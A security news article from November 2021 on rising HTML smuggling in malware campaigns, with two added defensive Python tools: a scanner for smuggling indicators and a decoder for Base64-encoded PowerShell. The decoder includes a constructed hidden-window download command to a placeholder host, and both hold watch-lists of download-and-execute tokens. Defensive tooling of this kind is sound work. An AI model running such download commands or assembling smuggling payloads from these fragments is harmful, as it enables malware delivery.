Posted on November 14, 2021 at 2:37 PM
More Hackers Are Now Using HTML Smuggling In Malware Attacks
A recent report reveals that threat actors are increasingly using HTML smuggling in malware and phishing campaigns. The Microsoft 365 Defender Threat Intelligence Team reported that these actors now rely on the technique to gain initial access to systems and plant their malware.
The Increasing Use Of HTML Smuggling
The range of threats includes ransomware payloads, remote access Trojans (RATs), and banking malware.
According to the report published by the security team, the threat actors are actively distributing the Mekotio banking Trojan, RATs such as NjRAT and AsyncRAT, and the very popular TrickBot malware.
The technique was publicly documented by Menlo Security in July 2021 as part of a multi-stage campaign it named ISOMorph.
HTML smuggling is a technique hackers use to smuggle first-stage droppers past defenses as encoded malicious scripts embedded in specially crafted HTML and JavaScript attachments. The payload is written to the target's system using basic features of HTML5 and JavaScript rather than by exploiting a vulnerability.
This allows the threat actors to construct the payload programmatically on the HTML page via JavaScript instead of making an HTTP request to fetch it from a web server.
The researchers noted that once targeted users open the HTML in their web browser, the embedded script decodes the malicious content and drops the payload onto the host device.
In doing so, it evades perimeter security solutions. The HTML dropper is then used to retrieve the main malware and execute it on the compromised endpoint.
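The passage above describes the defining trait of HTML smuggling: the file is assembled inside the browser from script and data already in the attachment, so a gateway that only inspects network downloads never sees a binary cross the wire. The following is an added example, not code from the article or from Microsoft's report: a heuristic scanner a mail-gateway or triage analyst could run over an HTML attachment to flag the client-side file-assembly features the article mentions (in-page Base64 decoding, Blob construction, object-URL creation, and a scripted download). The indicator list, weights, threshold and both HTML fixtures are constructed for this demo; the "suspicious" fixture deliberately contains indicator fragments only, not a working dropper.

```python
"""Heuristic scanner for HTML smuggling indicators in HTML/JS attachments.

Added example (not from the article or Microsoft's report). Indicator
weights and the alert threshold are assumptions for this demo; tune them
against your own attachment corpus. All sample inputs are constructed.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List

# (name, pattern, weight). These are the HTML5/JavaScript features that let
# a page materialise a file locally instead of fetching it over HTTP.
INDICATORS = [
    ("js_base64_decode", re.compile(r"\batob\s*\("), 2),
    ("blob_construction", re.compile(r"\bnew\s+Blob\s*\("), 2),
    ("object_url", re.compile(r"\bURL\.createObjectURL\s*\("), 2),
    ("legacy_save_blob", re.compile(r"\bmsSaveOrOpenBlob\s*\("), 2),
    ("download_attribute", re.compile(r"\.download\s*=|\bdownload\s*="), 1),
    ("scripted_click", re.compile(r"\.click\s*\(\s*\)"), 1),
    ("octet_stream_type", re.compile(r"application/octet-stream"), 1),
]
# A long uninterrupted Base64 run is a strong hint of an embedded binary.
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


@dataclass
class ScanResult:
    score: int = 0
    hits: List[str] = field(default_factory=list)
    embedded_blob_bytes: int = 0  # decoded size of the first long Base64 run

    @property
    def suspicious(self) -> bool:
        # Assumed threshold: roughly "decode + assemble + one delivery hint".
        return self.score >= 5


def scan_html(html: str) -> ScanResult:
    """Score an HTML document for HTML-smuggling indicators."""
    result = ScanResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(html):
            result.hits.append(name)
            result.score += weight
    match = LONG_B64.search(html)
    if match:
        result.hits.append("long_base64_literal")
        result.score += 2
        try:
            # validate=True rejects runs that are not really Base64.
            decoded = base64.b64decode(match.group(0), validate=True)
            result.embedded_blob_bytes = len(decoded)
        except ValueError:
            result.embedded_blob_bytes = 0
    return result


# --- constructed fixtures -------------------------------------------------
# Placeholder "payload": 256 bytes of text, Base64-encoded (344 characters).
PLACEHOLDER_B64 = base64.b64encode(
    b"constructed placeholder payload " * 8).decode("ascii")

BENIGN_HTML = """<html><body>
<h1>Monthly newsletter</h1>
<p>Read the full report <a href="https://example.invalid/report.pdf"
   download="report.pdf">here</a>.</p>
</body></html>"""

SUSPICIOUS_HTML = """<html><body><p>Loading invoice...</p>
<script>
  // constructed fixture: indicator fragments only, not a working dropper
  var bytes = atob("__B64__");
  var blob = new Blob([bytes], {type: "application/octet-stream"});
  var link = URL.createObjectURL(blob);
  /* delivery step intentionally omitted from this fixture */
</script>
</body></html>""".replace("__B64__", PLACEHOLDER_B64)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)):
        r = scan_html(doc)
        print(f"{label}: score={r.score} suspicious={r.suspicious} "
              f"hits={r.hits} blob_bytes={r.embedded_blob_bytes}")
```

A legitimate page can use any one of these features (the benign fixture uses a plain download attribute and scores 1), which is why the scanner weights combinations rather than alerting on a single API name; the decoded size of the embedded Base64 run is reported so an analyst can see at a glance whether the attachment is carrying something the size of an executable.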
State-Sponsored Hackers Also Use The Same Technique
The Microsoft researchers also noted that rather than sending a malicious executable over the network, the threat actors have the malware assembled locally, behind the firewall.
The ability to use HTML smuggling to bypass email gateways and web proxies has made the technique attractive for them to explore. It is also very enticing for cybercriminal groups and state-sponsored actors delivering malware in real-world attacks, according to the researchers.
The notorious Nobelium group, responsible for the well-documented SolarWinds supply chain attack, has also been observed using this tactic. It was seen delivering a Cobalt Strike Beacon in one of its sophisticated email-based attacks on non-governmental organizations, consultants, think tanks, and government agencies.
The hacking group used the technique to target organizations located across 24 countries, including the US and several European countries.
Apart from espionage operations, HTML smuggling has also been used in banking malware attacks, especially those involving the Mekotio Trojan. The threat actors generally send spam emails containing malicious links. Once the targeted user clicks the link, it triggers the download of a ZIP file containing a JavaScript downloader, which then retrieves binaries capable of keylogging and credential theft.
Beyond state-sponsored actors, other threat actors are also increasingly using HTML smuggling in their hacking campaigns. In September, an email campaign attributed to DEV-0193 was uncovered abusing the technique to deliver TrickBot.
Microsoft Urges Organizations To Improve On Security
The threat actors used malicious HTML attachments that generate a password-protected JavaScript file on the victim's computer when opened in a web browser.
Once the victim unknowingly supplies the password from the original HTML attachment, the JavaScript code executes. It then runs a Base64-encoded PowerShell command that downloads the TrickBot malware, which can lead to subsequent ransomware attacks on the affected system.
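The last step of that chain, a Base64-encoded PowerShell command, is opaque in process-creation logs unless the analyst knows that PowerShell's -EncodedCommand expects UTF-16LE text, not UTF-8. The following is an added example, not code from the article or from Microsoft's report: a small triage helper that pulls the encoded blob out of a command line, decodes it correctly, and flags download-and-execute cmdlets in the recovered script. The sample script, the command line built from it, and the list of risky tokens are constructed for this demo.

```python
"""Triage helper for Base64-encoded PowerShell command lines.

Added example (not from the article or Microsoft's report). The sample
script and risky-token list are constructed assumptions for this demo.
"""
import base64
import re
from typing import List, Optional

# Common spellings of the flag; PowerShell also accepts other unambiguous
# prefixes of -EncodedCommand, so extend this list for your environment.
ENCODED_FLAG = re.compile(r"^-(?:e|ec|enc|encodedcommand)$", re.IGNORECASE)

# Cmdlets and members that, in a decoded command, indicate the script is
# fetching or launching something (constructed watch-list for this demo).
RISKY_TOKENS = [
    "Invoke-WebRequest", "DownloadFile", "DownloadString",
    "Invoke-Expression", "IEX", "Start-Process", "-OutFile",
    "FromBase64String",
]

# Constructed sample: a harmless-looking fetch to a reserved test domain.
SAMPLE_SCRIPT = ("Invoke-WebRequest 'http://example.invalid/stage2' "
                 "-OutFile \"$env:TEMP\\stage2.bin\"")


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_sample_command_line() -> str:
    """Constructed process command line as it would appear in an event log."""
    return ("powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
            + encode_for_powershell(SAMPLE_SCRIPT))


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script, or None if no valid encoded command is found.

    Splitting on whitespace is enough here because the Base64 blob itself
    never contains spaces; quoted arguments elsewhere are not reassembled.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENCODED_FLAG.match(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:
                return None
            try:
                # A UTF-8 decode here would yield interleaved NUL bytes.
                return raw.decode("utf-16-le")
            except UnicodeDecodeError:
                return None
    return None


def flag_risky_tokens(script: str) -> List[str]:
    """List watch-list tokens present in the decoded script, as whole words."""
    found = []
    for token in RISKY_TOKENS:
        pattern = r"(?<![\w-])" + re.escape(token) + r"(?![\w-])"
        if re.search(pattern, script, re.IGNORECASE):
            found.append(token)
    return found


if __name__ == "__main__":
    cmdline = build_sample_command_line()
    decoded = decode_encoded_command(cmdline)
    print("command line:", cmdline[:80] + "...")
    print("decoded     :", decoded)
    print("risky tokens:", flag_risky_tokens(decoded or ""))
```

Running this over the process-creation events (for example Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled) turns an unreadable blob into a script that can be matched against ordinary detection rules; the decoder returns None rather than raising when the blob is not valid Base64 or not UTF-16, so it can be applied to every PowerShell event without special-casing.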
Microsoft noted that threat actors have increasingly used HTML smuggling to infiltrate victims' systems and steal sensitive data. The tech giant added that these campaigns are another indication that threat actors continuously refine specific components of their attacks, adopting highly evasive methods that make detection by security software very difficult.
Microsoft stated that the adoption of such tactics, techniques, and procedures is spreading among state-sponsored actors and cybercriminals alike. This lends credence to the view that threat actors are constantly looking for better techniques to attack systems while staying under the radar.
Because of this, Microsoft has advised organizations to strengthen their security posture against this new wave of threats using HTML smuggling.